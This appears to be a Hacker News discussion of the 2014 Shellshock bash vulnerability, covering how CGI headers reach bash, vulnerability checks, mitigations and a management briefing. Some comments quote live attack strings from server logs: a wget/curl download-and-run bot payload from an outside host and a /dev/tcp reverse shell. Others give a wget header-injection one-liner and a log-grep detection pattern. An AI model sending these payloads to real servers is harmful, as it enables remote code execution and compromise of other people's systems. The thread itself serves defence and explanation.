I've updated this to the latest patch which covers CVE-2014-7169.

why not simply chmod 0000 `which bash` ?

The problem is that some utilities rely heavily on bashisms such that they're unlikely to work with dash or other POSIX-compliant sh-replacements. As an Arch user, just off the top of my head, I can think of yaourt (AUR helper) and apparently the shell script for invoking gradle as both reliant on such behavior. The latter may not affect everyone, and after running into just those two samples today, I can only imagine what else may be affected.

The best solution I could think of as a work around is to install dash, repoint the /bin/sh symlink at dash, and then chown/chmod bash so that only those specific users who need to use it can use it. This isn't perfect, because it could still be affected by web services that run as users that would then have access to bash via their member group(s), or because a web service might rely on another application that itself requires specific bashisms in order to function.
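The workaround above can be sketched as follows; paths and the group name are assumptions, so the privileged steps are shown as comments rather than executed:

```shell
#!/bin/sh
# Sketch of the dash-as-/bin/sh workaround (review before use on a real box):
#   apt-get install dash          # or your distro's package manager
#   ln -sf dash /bin/sh           # repoint the /bin/sh symlink at dash
#   chgrp bashusers /bin/bash     # "bashusers" is a hypothetical trusted group
#   chmod 750 /bin/bash           # only root and group members may run bash
# Harmless verification step: see what /bin/sh currently resolves to.
ls -l /bin/sh
```

The `ls -l` at the end is the only line that runs; it just shows whether /bin/sh is already a symlink and where it points.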

This is why abandoning correctness for convenience can be dangerous.

This isn't really enough because /bin/sh is also a copy of bash (not a symlink).

A question worth asking: how long has this been exploited? If you have years of Apache logs, go back through them with "grep" and look for attempts to exploit this vulnerability. Report the earliest date on which you find a hit. Thanks.
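The log search above can be done with a fixed-string grep for the probe signature "() {". The sample file below is fabricated for demonstration; in practice point the grep at /var/log/apache2/access.log* or wherever your distro keeps them:

```shell
#!/bin/sh
# Create a tiny sample access log (one probe line, one normal line):
cat > /tmp/sample_access.log <<'EOF'
1.2.3.4 - - [24/Sep/2014:23:08:56 -0700] "GET /cgi-bin/test HTTP/1.0" 200 12 "-" "() { :;}; /bin/ping -c 1 evil.example"
5.6.7.8 - - [24/Sep/2014:23:09:00 -0700] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
# -F treats the pattern as a fixed string, so the parentheses need no escaping:
grep -F '() {' /tmp/sample_access.log
```

Only the probe line matches. Note this only works if your LogFormat records the User-Agent (or other header) fields at all.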

It would be really nice if log aggregation services (Splunk, Loggly, Papertrail, etc) would do this, notify affected customers, and publicly release anonymized information about it.

Default apache log doesn't show the contents of HTTP headers I believe.

So if your server is set up with limited permissions for the apache-user, are you still at risk?

I don't think the apache-user if properly restricted can write to directories, or even read most of the system files?

Things like that lower the risk: run everything as a low-privilege account (better, not even www-data but per-site), chroot()-ed, etc. and certain classes of attack will either fail or at least be easier to clean up.

The problem with all of this is that it assumes that you don't have privilege escalation vulnerabilities on the local system, which is often not the case unless non-trivial effort has gone into hardening the server – e.g. all of that privilege separation is a waste if someone sledgehammer-ed a chmod 777 into a script rather than setting the appropriate ownership and permissions or someone delayed a kernel update because they didn't want the downtime and “knew” that only trusted code ran on that system.

Apache user can probably write to /tmp, and from there the attacker can construct a way into the system (bindshell, reverse shell). He can then start reading your PHP config files (db passwords) or try to use other vulnerabilities to escalate his privileges.

It can read your application source code, read your database credentials, access your database, and exfiltrate its contents. Yes, you are at risk.

It doesn't seem to have trouble writing to /tmp in a typical low access scenario. Seems to me, anything can write to /tmp; the default mode on /tmp is 1777 (world-writable with the sticky bit).

I had someone exploit my Pydio install a few months ago with a litecoin miner. He managed to drop and run it in /tmp. He probably couldn't write and execute to too many other places.

From the article, it sounds like the issue is not just with Apache but also ssh, DHCP and others. So I'd just assume you're still at risk regardless of your Apache user configuration. (in any case, it's safer to act as if)

Isn't it kind of a security best practice to assume your web user can be compromised and plan accordingly with permissions?

From the article:

"Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell"

If you're on Ubuntu:

    a2dismod cgi
    service apache2 restart
If you're NOT running any CGI scripts this will disable CGI support in Apache. Not sure if that takes care of things 100%, but might be helpful.

If you're on Ubuntu or Debian your CGI scripts will probably use dash, not bash.

I've just checked our few Apache 2 systems that are Internet facing. Some of the site configs did have the standard Ubuntu CGI stanzas in them. However, the `/usr/lib/cgi-bin` directories were empty.

All this has made me a bit nervous though. I certainly didn't change the system to use bash instead of dash.

Debian yes, Ubuntu's default is bash. So is Mint's.

On Ubuntu, /bin/sh is a symlink to dash. /bin/sh is what system() will invoke.

It is, however when you create a user its default shell is bash unless otherwise specified.

Of course, but what's the exploit vector in that case?

That the users created for Apache, database daemons, etc., default to bash for CGI.

The passwd file contains the login shell configured for that user. Operating in the context of a daemon for most sane applications, this configuration doesn't (or shouldn't?) matter unless the user logs in. [1]

For Apache, I believe /bin/sh (or the shell it points to) is what's at issue here. [2]

[1] http://unix.stackexchange.com/questions/38175/difference-bet...

[2] http://security.stackexchange.com/questions/68146/how-do-i-s...

(This is also discussed earlier in the thread.)

Apache uses APR, which is a separate package/set of packages to the webserver proper. Depends on the distro how this works exactly. See for instance https://launchpad.net/ubuntu/precise/+source/apr-util

Unless the distro changes it, APR defines SHELL_PATH as a macro pointing to /bin/sh (note this isn't the env variable of the same name; that would be a serious problem if it was, since shellshock allows setting env variables by other means that are very public by now).

In a system I have access to, the installation procedure for some servers (not webserver necessarily) includes creating users with a full environment to be able to issue commands for these servers at a higher privilege. At the creation of these users, Ubuntu Server assigned them bash as their shell. I wonder if they're attackable at their public ports, but I haven't bothered trying to find attacking vectors since they were in production and the sysadmin got rid of bash as soon as he could. Not giving much detail here since I assume there will be plenty of compromised servers in the wild right now, including DB servers, proxies, etc.

init scripts will probably run from dash[1]

[1] https://wiki.ubuntu.com/DashAsBinSh

Erm what about mod_php etc?

from my understanding mod_php is not affected. However, if you have any system() calls in your PHP code AND you allow user input to be used in those system calls, then /bin/bash could be executed via the system call. If you control what is running in your system call - i.e.

    system("echo 'hello world'");
then I believe you are OK. But that's "security 101" and you should never be opening a system call to user input.

> AND you allow user input to be used in those system calls

This is not required for exploiting the vulnerability at hand.

I must not be understanding how this works then - how would /bin/bash be executed from a PHP system() call unless it was called directly from the command? And if you don't allow user input into the system call, how is /bin/bash going to be inserted into it? Thanks!

system() calls /bin/sh for you. If /bin/sh is linked to /bin/bash (a common thing), then it's exploitable.

Under the hood, system("echo foo") does a fork, and in the child process does execl("/bin/sh", "sh", "-c", "echo foo"); the whole command string is passed to sh as a single -c argument.

Yeah I get that - but surely just _calling_ /bin/bash isn't enough - you have to be able to pass in the arguments to bash that enable this exploit. And if you're not allowing user input into your system call, I still think this is a non issue in this scenario.

If php is being run from mod_cgi, then it is exploitable.

The full chain of the attack:

Request sent to the url, containing headers with '() { :;}; codehere'

Per CGI standard: environment variables are set with the attack code.

PHP is executed directly, with the environment containing the attack.

PHP calls system - the same environment is there, meaning the code is executed if /bin/sh points to bash.

N.B. - If /bin/sh is not bash, but the program executed by system() itself executes a call to system() which points to something explicitly calling bash (apply this recursively), the exploit is triggered.

It's not about passing "arguments" on the command line, its about what the environment variables are. It's not always immediately obvious how the env vars are constructed - everyone points to CGI because it's a well known scenario, but there are plenty of other cases where environment variables are set from user data.

tl; dr - in any situation user input is used in environment variables, simply calling /bin/bash is enough.
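The tl;dr above can be demonstrated in one line. The payload rides in an environment variable (HTTP_ACCEPT is just an example CGI-style name), never on the command line. A patched bash prints only "harmless"; an unpatched one would also run the injected echo and print "INJECTED":

```shell
#!/bin/sh
# The command line is entirely innocent; only the environment is tainted.
HTTP_ACCEPT='() { :;}; echo INJECTED' bash -c 'echo harmless'
```

This is why sanitizing your own inputs doesn't save you: the variable is set by the web server per the CGI spec before your code ever runs.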

Correct - if you are using PHP as a CGI. This does not affect mod_php.

And this of course is a non-issue:



Yeah - that would not be an issue for mod_php since it is about DHCP - if your server gets its IP from DHCP, then there's a potential issue, but since we're talking about mod_php here (not running PHP as a CGI, just mod_php) then the linked post is not related.

mod_php is just as vulnerable as running php cgi scripts.

It seems like the pathway must be

exploiter -> machine -> conduit (in this case, a web server) -> bash command through scripting language

but that doesn't really make sense to me. if it's in the header as a cookie header, in php that would require something like this:

$someVar = $_COOKIE['somecookiekey']; exec($someVar);

this is a super fringe case, and wouldn't warrant this big of a deal. for this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash.

otherwise the risk is super minimal, so I don't think it's a matter of making system/exec calls on user-supplied data.

No, you fundamentally and dangerously misunderstand the bug.

Your "exec($SomeVar)" example is a standard, unsanitized-input-passed-to-command-line type bug.

Shellshock does something fundamentally different. Everything on the actual command line is irrelevant to shellshock.

What happens is that the child Bash inherits env vars from the parent (which is often the web server). The shellshock bug is that the ENV VARS THEMSELVES are evaluated by bash as instructions.

Your actual PHP or whatever can be fully up to best-practices, sanitizing cookies and inputs, etc., and still fall vulnerable if one of the server-set environment variables like HTTP_ACCEPT_LANGUAGE has a malicious payload and ANYWHERE in your code, a subsequent system() call deep within some imported module gets fired off.

I'm sorry, my lack of understanding was supposed to be apparent in that post, and indeed you clarified that it's actually more the second scenario I hinted at. I was responding to people talking specifically about an underlying language making system calls and that not making said system calls from the language itself would keep you safe.

You're confirming the suspicion that I had. To wit:

"for this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash."

Not a buffer overflow, but if those headers are being fed upwards into bash, that's what we're both talking about.

in what way?

It's really not.

Don't forget to update any Docker instances of OS's. My brother just challenged me and I'd assumed my Docker Ubuntu instances would be updated automatically by updating the main Ubuntu OS but that was not the case. In my defense I'm still new to Docker.

I also used this to list my containers:

  docker ps -la -n=100
And removed them all, then listed images:

  docker images
And removed them and then ran this to get the latest ubuntu installed from docker:

  docker run -i -t ubuntu /bin/bash
Then when inside the container ran:

  env X="() { :;} ; echo busted" `which bash` -c "echo completed"
The new docker image of ubuntu is still vulnerable.

Edit: Updating the container then committing it (Docker terminology) should ensure that container stays updated, though any new runs creating new containers would continue to be vulnerable I suspect until Docker patches them or whomever would be responsible to do so.

Does anybody have steps for what to actually do as a sysadmin? Do I only need to install the newest bash (on Linux systems), or do I also need to restart daemons like nginx/apache etc.?

The vulnerability only affects bash when it is parsing environment variables, when it is just starting. So if a process is already running, it's not vulnerable and you don't have to restart it. You should definitely apply the patch from Wednesday, but be aware there is a related vulnerability that has no patch yet.

Add the configuration from this page https://access.redhat.com/solutions/1207723 to your Apache or nginx config to deny malicious HTTP requests.
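For reference, the package update itself is a one-liner on most distros (shown as comments below because it needs root; exact commands vary by family):

```shell
#!/bin/sh
# Upgrade just the bash package:
#   Debian/Ubuntu: apt-get update && apt-get install --only-upgrade bash
#   RHEL/CentOS:   yum update bash
# After upgrading, re-run the canary test; a fixed bash prints only this echo:
env x='() { :;}; echo vulnerable' bash -c 'echo canary complete'
```

If the canary prints "vulnerable" before "canary complete", the installed bash still parses the trailing command and needs the patch.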

This isn't always true. Frequently sub-shells are started without people really knowing, like with backticks or parentheses.

But the sub-shell that gets started will use the new binary, which will be safe.

The only suitable logo for this vulnerability: http://img3.wikia.nocookie.net/__cb20080920183129/nintendo/e...

I wonder which will cause a greater net suffering to mankind?

Is there a (low volume) mailing list that would have alerted me to both this and Heartbleed?

Your OS vendors security list.

Well, I mostly use Debian and Arch:

Debian isn't low volume: https://lists.debian.org/debian-security-announce/2014/threa...

Arch isn't high volume enough(!) https://mailman.archlinux.org/pipermail/arch-security/

Arch recommends the oss-security list, which is all too high volume http://www.openwall.com/lists/oss-security/2014/09/

I guess you want to filter e.g. the Debian list by the packages you have installed, ideally. An API to the same info would be nice.

Or filter the NVD feeds from http://nvd.nist.gov/download.cfm ?

For Debian that would be debian-security-announce [1], I try to read every post from that list.

1: https://lists.debian.org/debian-security-announce/

In another thread, I saw that this was an easy check to see if your bash was affected:

     env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get "busted" back, then you're affected...which is what I get with Mac OS X 10.9...however, when I try it on an Ubuntu server (14.x) that hasn't been patched in a while...I don't get the error...Er, why is that? I thought this pretty much affected every bash from the last 25 years?

(Someone else in this thread mentioned that Ubuntu uses dash...so...all modern Ubuntu servers are OK?)

No, you are not OK. Replace "sh" in that command with "bash" and you should still see the issue.

There is a lower likelihood that you'll see the issue, as anything which just uses sh (including the "system" function, and similar ones) will use dash instead of bash; but there will still be places where bash is called explicitly, including many shell scripts that depend on bash features, which are vulnerable.

Debian-based systems use dash instead of bash for /bin/sh. But if you have scripts that explicitly use bash, you are still at risk.

I tried this and it didn't work on my Ubuntu machine, it echoed "stuff". env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"

But then I tried this command and it echoed "vulnerable". env var='() { ignore this;}; echo vulnerable' bash -c /bin/true

AFAIK bash is the default terminal shell in all Ubuntus. So yeah, you're affected.

The attack isn't against terminal shells. The biggest risk is against things that use the shell implicitly like system()/popen()/etc and they all use /bin/sh

It's certainly possible to be at risk if, for instance, you had a CGI script that was specifically written in bash (i.e. starts with "#!/bin/bash") but that's a lot less likely.

So definitely patch your Debian/Ubuntu/etc machines but do your Redhat-based ones (and other places where "/bin/sh --version" indicates that it's bash) first.
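The "/bin/sh --version" triage mentioned above fits in one line; bash answers --version, while dash has no such option and errors out instead:

```shell
#!/bin/sh
# Print bash's version banner if /bin/sh is bash, otherwise a fallback note:
/bin/sh --version 2>/dev/null || echo "not bash (probably dash or another POSIX sh)"
```

Either way you get one line of output telling you which family of systems to patch first.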

It seems arbitrarily risky to say, effectively, "My bash is vulnerable, but it's OK because it's unlikely to be called due to the defaults being Something Else" -- that might be short-term reassurance, but it sure sounds safer to fix it even if you don't think it can be exploited.

By default I mean that new users are given bash as their shell by default, including the users for daemon services. So unless you assigned a different shell, or the service specifically asked for a shell other than the default linked by /bin/sh, then they will be running bash.

I see how Apache passes request information through environment variables but I don't see how bash comes into play in typical CGI.

Is anyone up for educating me?

I see http request -> apache -> env variables -> php

What am I missing?

When you use any functions in PHP to spawn another process (with the exception of pcntl_fork), PHP will execute a shell to run your process. That shell is then inheriting the parent environment.

If you (or any libraries you use) do not shell out, or if you're using php-fpm (which clears the env and passes headers outside of the environment), then you are safe.

I think I have the same question.. why is this called a "bash" bug? Is it not a webserver bug? Why does the webserver send data to bash through environment variables? Is there no better way to do it?

CGI is an interface first defined in 1993, 21 years ago. No one thought setting user data in environment variables was a risky thing at the time.

More modern interfaces between dynamic code and webservers, like even FastCGI or SCGI or dozens of others do not pass user data over Environment variables, and instead pass data in various protocols over a socket.

It's a bash bug because the bug is ultimately in how bash parses environment variables. My understanding is quite limited, but IIUC, the bash parser doesn't stop at the end of the exported function definition, so whatever commands trail it in the variable's value get executed immediately.

That's how Unix works. Subprocesses by default inherit the parent's environment. And the HTTP headers end up there because the CGI spec says so.

Wow, thanks for the downvotes, everyone!

I wonder how that is justified, since my question generated 10 informative replies, five levels deep.

Does anyone dare to tell me why they downvoted my comment?

You are correct, you asked an innocent and to-the-point question.

If something, it's a bug in the CGI specification, since passing HTTP headers as environment variables is part of the standard.

Sort of I guess, but why does bash need to loop over all of the env variables and execute them? I don't think CGI had any reason to think that would ever happen?

(I guess that's basically what it's doing?)

Bash is a shell; part of its purpose is to deal with environment variables. The bug here is that the parser is getting confused. The feature being abused here is being able to declare functions as part of an environment variable, which is used to transfer functions to subshells in bash. Now this itself is fine, but since the parser gets confused it also executes commands after the function definition.

Thanks. So why isn't even being able to declare functions risky? Could an attacker overwrite built-in functions?

They could, you can try for yourself:

    git='() { echo hello; }' bash -c git
but it's generally understood that attackers should not be able to provide environment variable names. If the attacker can do that, they can also provide an alternative LD_PRELOAD variable.

Though IMO, yes this is risky.

I honestly can't see why this is "fine"... I understand it's not the security critical bug, but feeding all environment variables into some sort of interpreter...?!?

Ok, bash needs to transfer function definitions to child processes in order to implement something called inherited functions, and I guess you could argue that an environment variable is a reasonable place to store them. But WHY THE HELL does bash have to use the function name as the variable name?!? That's just insane to me...

Any sane programmer would store that shit in an environment variable with a known name (e.g. "BASH_INHERITED_FUNCTIONS"). Why doesn't bash do that?!?

It appears they are talking about requiring prefixes for these vars (finally). Still, you look at the C code / macros that parse this shit and have to shake your head. This is what they mean by "attack surface". http://www.openwall.com/lists/oss-security/2014/09/25/13

Thank you God! :)

There's nothing wrong with putting arbitrary data inside an environment variable that other programs don't assign meaning to.

The issue is that bash takes it upon itself to parse all environment variables for functions, and accidentally executes some of them.
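The legitimate feature being discussed (function export to subshells) can be sketched in one line. Note this is the sanctioned `export -f` path, not the bug; post-patch bash encodes exported functions under mangled variable names like BASH_FUNC_name%% precisely so that ordinary variables are never parsed as code:

```shell
#!/bin/sh
# The outer bash defines and exports a function; the inner bash receives it
# through the environment and can call it by name.
bash -c 'greet() { echo exported function ran; }; export -f greet; bash -c greet'
```

Shellshock happened because pre-patch bash used the function's own name as the variable name and scanned every inherited variable for function syntax.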

Folks, for what it's worth, here is a management briefing I wrote this morning. Please feel free to re-use, but please do give proper attribution. Please do comment and correct as appropriate.

Summary: Briefing for management on activities to minimize impacts of the "shellshock" computer vulnerability.

Status: Testing underway. Initial appraisals are that public-facing systems are likely not subject to shellshock. NOTE: The situation is fluid, due to the nature of the vulnerability. Personnel are also reaching out to hosting providers to assess the status of intervening systems.

What is it? A vulnerability in a command interpreter found on the vast majority of Linux and UNIX systems, including web servers, development machines, routers, firewalls, etc. The vulnerability could allow an anonymous attacker to execute arbitrary commands remotely, and to obtain the results of these commands via their browser. The security community has nicknamed the vulnerability "shellshock" since it affects computer command interpreters known as shells.

How does it work? Command interpreters, or "shells", are the computer components that allow users to type and execute computer commands. Anytime a user works in a terminal window, they are using a command interpreter - think of the DOS command prompt. Some GUI applications, especially administrative applications, are in fact just graphical interfaces to command interpreters. The most common command interpreter on Linux and UNIX is known as the "bash shell". Within the last several days, security researchers discovered that a serious vulnerability has been present in the vast majority of instances of bash for the last twenty years. This vulnerability allows an attacker with access to a bash shell to execute arbitrary commands. Because many web servers use system command interpreters to fulfill user requests, attackers need not have physical access to a system: The ability to issue web requests, using their browser or commonly-available command line tools, may be enough.

How bad could it be? Very, very bad. The vulnerability may exist on the vast majority of Linux and UNIX systems shipped over the last 20 years, including web servers, development machines, routers, firewalls, other network appliances, printers, Mac OS X computers, Android phones, and possibly iPhones (note: It has yet to be established that smartphones are affected, but given that Android and iOS are variants of Linus and UNIX, respectively, it would be premature to exclude them). Furthermore, many such systems have web-based administrative interfaces: While many of these machines do not provide a "web server" in the sense of a server providing content of interest to the casual or "normal" user, many do provide web-based interfaces for diagnostics and administration. Any such system that provides dynamic content using system utilities may be vulnerable.

What is the primary risk? There are two: data loss and system modification. By allowing an attacker to execute arbitrary commands, the shellshock vulnerability may allow the attacker to both obtain data from a system and to make changes to system configuration. There is also a third risk, that of using affected systems to launch attacks against other systems, so-called "reflector" attacks: The arbitrary command specified by the attacker could be to direct a network utility against a third machine.

How easy is it to detect the vulnerability? Surprisingly easily: A single command executed using ubiquitous system tools will reveal whether any particular web device or web server is vulnerable.

What are we doing? Technical personnel are using these commands to test all web servers and other devices we manage and are working with hosting providers to ensure that all devices upon which we depend have been tested. When devices are determined to be vulnerable, a determination is made whether they should be left alone (e.g., if they are not public facing and patches are either not yet available or would be disruptive at this time, or if there are other mitigations or safeguards in place), patched (e.g., if patches are available and are low impact), or turned off (e.g., if patches are not available, risk is high, and the service is not mandate critical).

Updates to this briefing will be provided as the situation develops.

> Initial appraisals are that public-facing systems are likely not subject to shellshock.

All the managers I know will stop reading after this, sit back and think "aaah, those silly techies. Worrying about nothing".

I gave exactly the opposite advice: We should assume every public and non-public facing system is vulnerable (many were). I'd rather cause a big stinky scare and be proven wrong than downplay the issue and be proven wrong... the hard way.

You probably had a good reason for saying this to your organisation, but it's not something that other people should blindly re-use for their own purposes.

Yes, I did have a good reason: Our initial tests indicate that the organization is not vulnerable.

To be fair to you and to me, I can understand your take on what I posted, but what I posted was redacted to remove organization-identifying information. A better redaction would perhaps have been: "Our initial scans and appraisals are that our public-facing systems are likely not subject to shellshock."

> Android and iOS are variants of Linus

... which is, in turn, a variant of Richard.

iOS systems are not vulnerable unless jailbroken. There are no shells, let alone bash, present in the iOS system.

Good to know, thanks!

Android and iOS are variants of Linus

What kind of variants? Doppelgänger? Clones? SCNR

Oops. Now that's funny. I had to reread several times to grok your comment. Now that I do, I am having a good laugh. I'll edit the post shortly.

EDIT: Or not - the edit button has gone. Ah well.

For any companies that handle customer data, especially PII or credit card information, even having the data accessed could be actionable and result in massive costs/fines.

This would be a major risk, IMHO.

Is there a way of preventing functions from being imported from the environment, but still allowing some variables in?

My experiments with

    #!/usr/bin/env -i sh

and

    #!/usr/bin/env - sh

...have not obtained what I'm after.

The problem being that functions take precedence over names in the file system, so

    bash-4.2$ env '/bin/cp=() { echo oops;}' /bin/sh -c '/bin/cp /tmp/foo /tmp/bar'

...which, on an unpatched bash, prints "oops" instead of copying the file.

If an attacker can fully control the name of an injected environment variable, then you've lost already. The attacker can override LD_PRELOAD, which is an environment variable honored by the dynamic loader (ld.so) for every dynamically linked program.

LD_PRELOAD is not honored for setuid executables, but you're right, we don't want to go there.

On Linux, dhclient-script is written in bash. If it is vulnerable, then connecting to open wifi can be exploited via a rogue DHCP server.
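The reason this works is that dhclient hands server-supplied option values to dhclient-script through environment variables (with names like new_domain_name), and a rogue server controls those values. A rough simulation of the injection, with no real DHCP involved (the variable name is illustrative):

```shell
# A rogue DHCP server could put a Shellshock payload in an option value
# that dhclient exports before invoking dhclient-script with bash.
payload='() { :;}; echo owned'
env "new_domain_name=$payload" bash -c ':'
# An unpatched bash imports the value as a function and runs "echo owned";
# a patched bash treats it as an ordinary variable and prints nothing.
```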

Keep an eye on the patches directory for whatever version you use:


Just had to manually patch a CentOS4 legacy system.

What I find interesting is that the patch has been around since the 16th; what took so long, and what finally lit a fire under the mainstream *nix releases?

>CentOS4 legacy system

Jesus. That's been out of support for well over 2 years. I can't imagine this is the only problem it has. I'm curious: what's keeping the organization from upgrading it?

Heh, you should see some of the systems that orgs I work with still have running. Just checked on one of my favorites:

  $ uptime
   07:26:20 up 3280 days, 16:23,  2 users,  load average: 0.00, 0.00, 0.00
  $ cat /etc/issue
  Debian GNU/Linux 3.1 \n \l

This one doesn't even have the excuse of running a piece of lab equipment (I saw such a system recently running Win95 without OSR1, so it doesn't even have USB support. They move data around with ZIP disks!).

Attached via the 25-pin parallel port, no doubt?

I've got to maintain a couple of RHEL4 servers that have simulation software running on them that has never been ported forward (education - the people who wrote it have long since left). Though we also still have a couple of DEC Alphas kicking about attached to nanofabrication services. Fun times... Luckily I don't need to maintain all the win98 boxes we still have as well. Or the DOS ones.

Variety is the spice of life, and all that...

Well it was immune to heartbleed, lol

(ancient openssl never had tls heartbeat feature)

But Red Hat actually still supports EL4 through their ELS program and will release patches for it until March 31, 2017


CentOS simply decided not to keep up with it anymore, cannot blame them.

Usually time and money.

That or it does something ridiculously specific with a rare feature that was removed and the people who built it have left.

You find a lot of that type in education/local government.

I saw a couple of these hurled against my simple site:

    "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

You can tail your access.log and grep for the expression "\(\s*\)\s*{|cgi" to get an idea whether someone is trying to exploit your webserver. The cgi part will return a lot of false positives, but if you cannot disable cgi, you might as well track when it's requested.
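To try that grep without waiting for real traffic, here is a self-contained sketch against a fabricated log line (the file path and log entry are made up, and [[:space:]] is used in place of \s for portability across grep implementations):

```shell
# Write one fabricated access.log entry carrying a Shellshock-style User-Agent.
printf '%s\n' '1.2.3.4 - - [26/Sep/2014] "GET / HTTP/1.0" 200 "-" "() { :;}; /bin/ping -c 1 x"' > /tmp/demo_access.log

# Match "()" followed by "{" with optional whitespace, or any cgi request.
grep -E '\([[:space:]]*\)[[:space:]]*[{]|cgi' /tmp/demo_access.log
```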

That will only find either clumsy exploit attempts or whitehat scans that are not trying to hide themselves.

CGI sends most headers through to the script as environment variables (i.e. a Foobar: header will turn into $HTTP_FOOBAR), so an attacker can just pick a header name that isn't likely to be logged.
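The mapping is mechanical (per the CGI spec: uppercase the header name, replace "-" with "_", prefix with HTTP_), so the attacker has free choice of variable name. A quick simulation of the rule, with a made-up header name:

```shell
# Simulate the CGI header-name-to-variable-name mapping.
header="X-Evil-Header"
var="HTTP_$(printf '%s' "$header" | tr 'a-z-' 'A-Z_')"
echo "$var"   # HTTP_X_EVIL_HEADER
```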

Has anyone suggested and/or implemented something like building a tiny wrapper for bash that would clean the environment and then execve("/bin/bash.vulnerable", argv, cleaned_envp)?

In the Red Hat links (already in the comments here) there is an LD_PRELOAD file which cleans the environment for _all_ your processes.

    $ /usr/bin/env - /usr/local/bin/bash -c set sh

Can anyone explain what I should do on OSX?

I've heard that replacing /bin/bash with a newer version of bash from homebrew or even zsh will work but is that going to break anything that assumes 3.2 bash??

You can apply the patch to the OS X version of 3.2: http://apple.stackexchange.com/questions/146849/how-do-i-rec...

I've been running upgraded bash - and more recently, just zsh, in OSX for years. It has never broken anything here.

I think the risk of breaking something is outweighed by the risk of exploit.

have you pointed /bin/sh and /bin/bash at it?

Are you running an HTTP or SSH server that faces the public? If so, you need to update or take mitigation steps ASAP. If not, you can wait until Apple patches.

I'm reluctant to add to uncertainty, but I'm not sure these are the only concerns. Many Linux systems execute shell scripts via bash after acquiring a DHCP address, and would be vulnerable if someone took over the DHCP servers in, say, a co-working space, cafe or airport and maliciously configured them. I'm not 100% sure if Mac OS X (or iOS) uses shell scripts for post-assignment configuration. The short answer is to be careful about wireless access you don't control until Apple issues a patch.

Wait, what? I know DHCP clients have had exploits but those were of the more mundane buffer overflows/range checking type; there are DHCP clients implemented in bash? Something doesn't seem right about that - AFAIK DHCP data like IPs and so forth are binary, not text.

Edit: just saw https://news.ycombinator.com/item?id=8367086 - may look into that a little more.

I've seen a lot of talk regarding the impact on embedded devices, but how many of these actually run GNU Bash? I can't think of many embedded devices that don't use Busybox instead.

>I can't think of many embedded devices that don't use Busybox instead.

What about all these shitty wireless routers out there? I think in the past they were QNX-based but they've long moved to being Linux-based. We know popular projects like dd-wrt and pfsense are probably okay (ash instead of bash), but what about the thousands of others? My own router is supplied by AT&T for its u-verse service. God knows what it's running. Or all the NAS devices out there and load balancers, etc.

I guess we'll find out when the whitehats are done scanning the entire internet for vulnerable hosts.

I have a higher-end (albeit still consumer-level) ASUS wireless router that uses Busybox. I can't imagine that cheaper, lower-end models would be using full GNU bash instead.

I've only seen 2 requests in my logs:

    access.log: - - [25/Sep/2014:06:28:08 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 447 "-" "() { :;}; /bin/ping -c 1"

    access.log: - - [26/Sep/2014:13:38:10 +0000] "GET / HTTP/1.0" 200 473 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'"

This is with only static content (all logic implemented via cron).

    $ grep nginx /etc/passwd

    nginx:x:105:111:nginx user,,,:/nonexistent:/bin/false

And the only other service listening on this machine is SSH, but it's limited by iptables to my home IP only.

I think I'm safe. Installing the patched bash now anyway.

Anyway, I've seen that syntax before (I'm talking years here), in #bash on freenode.

It's just that nobody in the channel ever looked at it from a security viewpoint...

When comparing the security warnings from Red Hat https://access.redhat.com/solutions/1207723 vs Ubuntu http://www.ubuntu.com/usn/usn-2362-1/ the Red Hat one wants you to run /sbin/ldconfig or reboot your machine. Why does Ubuntu not recommend this? Do they run ldconfig automatically?

The vulnerability only exists during the startup of a bash process. Updating bash is enough. Bash processes that are already running are past the point where they could be exploited. Future calls to bash will get the updated version. No services need to be restarted to apply the fix.

Pretty sure it's run as a one-shot boot service on almost all distros.

Has anyone constructed this exploit as a simple `wget` command?

    wget --header='Referer: () { :;}; touch /tmp/vulnerable' www.example.com

Note that you'll typically want to supply the URL to a CGI script on the site, not just www.example.com. Don't think you're unaffected just because the top-level page of your site doesn't appear vulnerable.

Is there some easy way of detecting whether a site you don't control is vulnerable, without bringing it down?

Yes, you can ask it to ping an address you control and record where the pings come from.

Either of these will typically show you your running shell:

    ps -p $$
    echo $0

($0 is the command name that was used to invoke the shell.)

Not reliable: echo $SHELL (the preferred shell for the user, not necessarily what is running).

Also note that you may want to remove/fix bash to make sure it doesn't get run by something else. A CGI script may run it despite you changing your default shell to something else.

I bet Microsoft are enjoying the fact that it is Linux that seems to have all the security vulnerabilities these days!

On the one hand, if this had been in Windows, no one in the public would have been able to stumble across it, though you would expect them to be paying rooms full of engineers to make sure that's never necessary (and yet stuff happens.)

On the other hand, despite the premise of open source that 'many eyes make all bugs shallow', the amount of code in the wild and the complexity of it (and the diversity of implementation languages) has pretty much guaranteed that there's more code than possible coverage.

No one has to come up with clever marketing for Microsoft exploits because everyone expects there to be tons of them, given the level of complexity, and that Microsoft will push patches for them, because it affects their bottom line. Meanwhile, it seems in the open source world, you need PR campaigns to goad the community into due diligence.

Considering most exploits are found via fuzzing tools, I think your assumption is pretty far away from reality.

If people could casually look at code and see vulnerabilities, then we wouldn't have any.

Also: MS Shared Source initiative

But people can casually look at code and see vulnerabilities, any time they want.

Although your point about the methods of exploits changing the dynamic is valid.

>Also: MS Shared Source initiative

Fair point.

>But people can casually look at code and see vulnerabilities, any time they want.

They could, but they don't. Same way I can look at the sky and see an asteroid. Possible? Sure. Likely? Not without some pretty advanced tools or a hell of a lot of luck.

>But people can casually look at code and see vulnerabilities, any time they want.

I think you're dismissing the level of experience, smarts, and inter-disciplinary knowledge it takes to find a bug like this. More than likely, even those with all of those skills, even the top 1% of them, can't just eyeball code and go, "Ah yes, here." They're instead writing a lot of little tools and seeing what they can break. Then they go back, see what broke, and work out if it's possible to exploit that exception or crash condition.

These types of tools and methods work just as well with closed source. Attacking closed source seems very unfair to me in these scenarios.

Do you have any evidence that this was found by looking at the code, as opposed to stumbling across it in use?


> ...if this had been in Windows, no one in the public would have been able to stumble across it...

